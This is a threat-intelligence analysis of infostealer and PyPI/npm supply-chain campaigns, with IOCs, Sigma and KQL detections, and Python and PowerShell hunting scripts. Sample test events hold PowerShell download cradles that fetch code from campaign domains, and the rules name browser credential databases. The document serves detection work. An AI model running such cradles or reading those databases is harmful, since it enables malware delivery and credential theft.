
Vidar, SilabRAT & PyPI Supply Chain Attacks: Multi-Vector Credential Theft Campaign Analysis

Security Arsenal Team
June 13, 2026

The latest OTX pulses indicate a surge in credential theft activity utilizing diverse and sophisticated delivery vectors. Threat actors are capitalizing on current trends—specifically Artificial Intelligence hype and short-form video platforms—to distribute Infostealers like Vidar and Lumma. Concurrently, a supply chain campaign targeting Python (PyPI) and Node.js (npm) developers is deploying worms such as Hades and Mini Shai-Hulud.

The primary actors include Storm-3075, leveraging malvertising and SEO poisoning to distribute Vidar and Lumma Stealer, and o1oo1, the developer of SilabRAT, a Malware-as-a-Service (MaaS) offering featuring Hidden Virtual Network Computing (HVNC) for browser profile cloning. While distinct actors, the collective objective across these pulses is financial gain through the theft of cryptocurrency wallets, session cookies, and corporate credentials. The emergence of SilabRAT is particularly concerning due to its advanced session hijacking capabilities that bypass traditional MFA controls.

Threat Actor / Malware Profile

Vidar Stealer & Lumma Stealer (Storm-3075)

  • Distribution: Malvertising campaigns impersonating AI brands (ChatGPT, Claude) and fake software tutorials on TikTok/Instagram Reels instructing users to run PowerShell commands.
  • Payload Behavior: Info-stealer targeting browser data (passwords, cookies, history), cryptocurrency wallets, and 2FA session files.
  • C2 Communication: Uses HTTP/HTTPS to exfiltrate stolen data to hardcoded C2 domains (e.g., brokeapt.com).

SilabRAT (o1oo1)

  • Distribution: Sold on dark web forums for ~$5,000/month; delivered via loaders like HijackLoader.
  • Payload Behavior: Remote Access Trojan (RAT) with HVNC capabilities, allowing attackers to control the victim's machine invisibly. Specializes in "browser profile cloning" to hijack active sessions without triggering 2FA re-prompting.
  • Persistence: Uses registry run keys and scheduled tasks. Employs AsmCrypt for obfuscation.

Hades / Mini Shai-Hulud / Miasma (Supply Chain)

  • Distribution: Malicious packages on PyPI and npm mimicking legitimate bioinformatics libraries (e.g., colorama, request).
  • Payload Behavior: Uses malicious .pth startup hooks and trojanized .abi3.so native extensions to execute upon Python import. Capable of stealing credentials and spreading laterally.
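CPython's site module processes every .pth file in a site-packages directory at interpreter startup and passes any line that begins with `import` to exec(), which is the mechanism behind the startup hooks described above. The audit script below is an added example written for this analysis, not code from the referenced research or from any of the campaigns. It scans the running interpreter's site directories (or directories given on the command line) for executable .pth lines and marks files whose names match common tooling so they can be triaged first. The constructed sample directory, the KNOWN_PTH_NAMES set and the helper names are illustrative assumptions, not values from the page.

```python
"""Audit .pth files for lines that the Python site module would execute at startup."""
import os
import site
import sys
import tempfile

# File names commonly dropped by well-known tooling (virtualenv, setuptools).
# Assumption for triage only: a matching name is "known", not proven benign.
KNOWN_PTH_NAMES = {"_virtualenv.pth", "distutils-precedence.pth"}


def executable_pth_lines(pth_path):
    """Return (lineno, line) for every line that site.addpackage() would exec()."""
    hits = []
    with open(pth_path, encoding="utf-8", errors="replace") as fh:
        for lineno, raw in enumerate(fh, 1):
            line = raw.rstrip("\r\n")
            if not line.strip() or line.startswith("#"):
                continue
            # CPython checks exactly these two prefixes before calling exec()
            if line.startswith(("import ", "import\t")):
                hits.append((lineno, line))
    return hits


def audit_site_dirs(site_dirs):
    """Map each .pth file under the given directories to its executable lines."""
    findings = {}
    for directory in site_dirs:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            if name.endswith(".pth"):
                path = os.path.join(directory, name)
                hits = executable_pth_lines(path)
                if hits:
                    findings[path] = hits
    return findings


def triage(findings):
    """Flatten findings and mark hooks whose file name matches well-known tooling."""
    rows = []
    for path, hits in findings.items():
        for lineno, line in hits:
            rows.append({
                "file": path,
                "lineno": lineno,
                "line": line,
                "known_name": os.path.basename(path) in KNOWN_PTH_NAMES,
            })
    return rows


def build_sample_dir():
    """Create a constructed site-packages directory with two .pth files (sample data)."""
    directory = tempfile.mkdtemp(prefix="pth-audit-")
    with open(os.path.join(directory, "_virtualenv.pth"), "w") as fh:
        fh.write("import _virtualenv\n")
    with open(os.path.join(directory, "constructed-hook.pth"), "w") as fh:
        fh.write("# constructed sample, not a real package\n"
                 "/opt/constructed-example/lib\n"
                 "import os; print('startup hook executed')\n")
    return directory


def interpreter_site_dirs():
    """Site directories of the running interpreter, where real hooks would live."""
    dirs = list(getattr(site, "getsitepackages", lambda: [])())
    dirs.append(site.getusersitepackages())
    return dirs


if __name__ == "__main__":
    targets = sys.argv[1:] or interpreter_site_dirs()
    for row in triage(audit_site_dirs(targets)):
        tag = "known-tooling" if row["known_name"] else "REVIEW"
        print(f"[{tag}] {row['file']}:{row['lineno']}: {row['line']}")
```

Run it with no arguments to audit the current interpreter, or pass one or more site-packages paths. Any line tagged REVIEW runs on every interpreter start, so it should be traced back to the package that installed it (pip's RECORD files list the owner) before the environment is trusted again.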

IOC Analysis

The provided pulses yield a mix of network and file-based indicators:

  • Domains & Hostnames: msget.run, d4ug.site (TikTok Vidar C2), brokeapt.com (AI-themed malvertising), rongtv.xyz subdomains. SOC teams should immediately block these at the DNS layer and inspect logs for historical resolutions.
  • File Hashes: Numerous SHA256 hashes associated with loaders (HijackLoader), main payloads (Vidar, SilabRAT), and malicious Python wheels. EDR solutions should be configured to quarantine any files matching these hashes.
  • CVEs: Pulse 2 references CVE-2026-20128 and CVE-2026-20133 regarding Cisco SD-WAN exploitation. While primarily an access vector, successful exploitation provides the foothold for credential dumping tools.

Detection Engineering

```yaml
---
title: Potential Vidar Stealer Execution via PowerShell
description: Detects potential execution of Vidar Stealer via PowerShell commands downloading from suspicious domains observed in TikTok campaigns.
status: experimental
author: Security Arsenal
date: 2026/06/14
references:
  - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  service: security
detection:
  selection_process:
    EventID: 4688
    NewProcessName|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  # Download cradle and IOC domain are separate selections so both must be present;
  # a single selection cannot carry the same field key twice in YAML.
  selection_download:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_domain:
    CommandLine|contains:
      - 'msget.run'
      - 'd4ug.site'
  condition: all of selection_*
falsepositives:
  - Legitimate administrative scripts
level: high
---
title: Suspicious Python Import via Malicious PyPI Wheel
description: Detects execution patterns associated with the Hades/Mini Shai-Hulud PyPI supply chain attack, specifically loading malicious .so or .pth files.
status: experimental
author: Security Arsenal
date: 2026/06/14
references:
  - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  product: linux
  definition: 'Assume standard sysmon or auditd logging for process execution'
detection:
  selection_python:
    Image|endswith:
      - '/python'
      - '/python3'
    CommandLine|contains:
      - 'import'
      - '-c'
  selection_suspicious_lib:
    CommandLine|contains:
      - '.pth'
      - '.abi3.so'
  selection_paths:
    # References specific paths often abused by sys.path modification in these attacks
    CommandLine|contains:
      - 'site-packages'
  condition: all of selection_*
falsepositives:
  - Legitimate developer environment builds
level: high
---
title: Credential Theft Accessing Browser Databases
description: Generic detection for infostealers like Vidar, Lumma, and SilabRAT accessing browser SQLite databases for credential theft.
status: experimental
author: Security Arsenal
date: 2026/06/14
references:
  - https://www.microsoft.com/en-us/security/blog/2026/06/08/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering/
tags:
  - attack.credential_access
  - attack.t1005
logsource:
  category: file_access
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\AppData\Local\Google\Chrome\User Data\Default\Cookies'
      - '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
      - '\AppData\Roaming\Mozilla\Firefox\Profiles\'
      - '\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cookies'
  filter:
    Image|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\brave.exe'
      - '\msedge.exe'
  condition: selection and not filter
falsepositives:
  - Browser synchronization tools
  - Backup software
level: high
```
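To check exactly what the Vidar rule demands of a process-creation event, the following is a minimal evaluator for the Sigma `contains` and `endswith` matching, written as an added example for this analysis rather than taken from the original post or from any Sigma tooling. It runs the three Vidar selections over a handful of constructed 4688 records (not real telemetry). The point it makes is that the PowerShell image, a download cmdlet and an IOC domain must all be present in the same event; matching on the domain alone would also fire on harmless commands that merely mention it. Field names follow the rule; the sample command lines are constructed.

```python
"""Minimal evaluator for the Sigma-style Vidar rule, run over constructed events."""

# Detection block mirroring the Vidar rule: three selections, all required.
VIDAR_DETECTION = {
    "selection_process": {
        "EventID": 4688,
        "NewProcessName|endswith": ["\\powershell.exe", "\\pwsh.exe"],
    },
    "selection_download": {
        "CommandLine|contains": ["Invoke-WebRequest", "IEX", "DownloadString"],
    },
    "selection_domain": {
        "CommandLine|contains": ["msget.run", "d4ug.site"],
    },
}

# Constructed 4688 records (not real telemetry); only the fields the rule reads.
SAMPLE_EVENTS = [
    {"EventID": 4688,
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://msget.run/x')\""},
    {"EventID": 4688,
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://www.microsoft.com/ -OutFile update.msi"},
    {"EventID": 4688,
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c echo msget.run"},
    {"EventID": 4688,
     "NewProcessName": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c \"(New-Object Net.WebClient).downloadstring('http://D4UG.SITE/a')\""},
    {"EventID": 4689,
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell IEX https://msget.run/x"},
]


def value_matches(actual, expected, modifier):
    """Sigma compares strings case-insensitively; modifier is None, contains,
    startswith or endswith."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if modifier is None:
        return a == e
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(event, selection):
    """Every field in a selection must match (AND); a list of values is an OR."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(value_matches(event.get(field), v, modifier or None) for v in values):
            return False
    return True


def rule_matches(event, detection):
    """Evaluate 'condition: all of selection_*'."""
    selections = [s for name, s in detection.items() if name.startswith("selection")]
    return all(selection_matches(event, s) for s in selections)


def hunt(events, detection=VIDAR_DETECTION):
    """Return the indices of events that trigger the rule."""
    return [i for i, ev in enumerate(events) if rule_matches(ev, detection)]


if __name__ == "__main__":
    for i in hunt(SAMPLE_EVENTS):
        print(f"[!] event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Only events 0 and 3 fire: event 1 downloads from a legitimate host, event 2 mentions the domain from cmd.exe without any download cradle, and event 4 is a process-exit record (4689), not a creation. The same evaluator can be pointed at exported 4688 events to validate the rule before it is deployed to a SIEM.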


```kql
// Hunt for network connections to known C2 domains from OTX Pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "msget.run",
    "d4ug.site",
    "brokeapt.com",
    "rongtv.xyz",
    "ssffaa19.xyz"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
```


```powershell
# IOC Hunt Script for Vidar and SilabRAT Artifacts
# Requires Administrative Privileges

# Hashes are kept per algorithm so each file is compared against the right digest
$IOC_SHA1   = @("4f5c5b3ef45cfff7721754487a86aeff9a2e6e32")             # Vidar SHA1
$IOC_SHA256 = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531", # Vidar SHA256
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b"  # SilabRAT SHA256
)

$SuspiciousDomains = @("msget.run", "d4ug.site", "brokeapt.com")

Write-Host "[+] Checking DNS Cache for Suspicious Domains..."
# Match the domain itself and any subdomain of it (e.g. cdn.msget.run)
Get-DnsClientCache | Where-Object {
    $entry = $_.Entry
    @($SuspiciousDomains | Where-Object { $entry -eq $_ -or $entry -like "*.$_" }).Count -gt 0
} | Select-Object Entry, Data

Write-Host "[+] Scanning for known malicious file hashes in C:\Users..."
# -File skips directories (Get-FileHash cannot hash them); -Force includes hidden AppData content
Get-ChildItem -Path "C:\Users" -File -Recurse -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0kb -and $_.Length -lt 10mb } |
    ForEach-Object {
        $sha256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        $sha1   = (Get-FileHash -Path $_.FullName -Algorithm SHA1   -ErrorAction SilentlyContinue).Hash
        # -contains compares case-insensitively, so the uppercase output of Get-FileHash matches
        if ($IOC_SHA256 -contains $sha256 -or $IOC_SHA1 -contains $sha1) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

Write-Host "[+] Checking for suspicious scheduled tasks (Common Persistence for SilabRAT/Vidar)..."
Get-ScheduledTask | Where-Object { $_.Actions.Execute -match "powershell" -or $_.Actions.Execute -match "cmd" } |
    Select-Object TaskName, TaskPath, Actions
```


Response Priorities

  • Immediate: Block all identified IOCs (domains brokeapt.com, msget.run, IP 91.199.163.124) at the firewall and proxy level. Quarantine endpoints matching the provided file hashes.
  • 24h: Initiate credential resets and identity verification for users in targeted sectors (Education, Finance, Tech) who may have interacted with AI-themed phishing or TikTok links. Review browser session logs for suspicious login locations.
  • 1 Week: Harden the software supply chain by implementing strict dependency verification (SBOM checks) for Python and npm packages. Conduct security awareness training focused on "AI-powered" social engineering and the risks of executing code from social media tutorials.
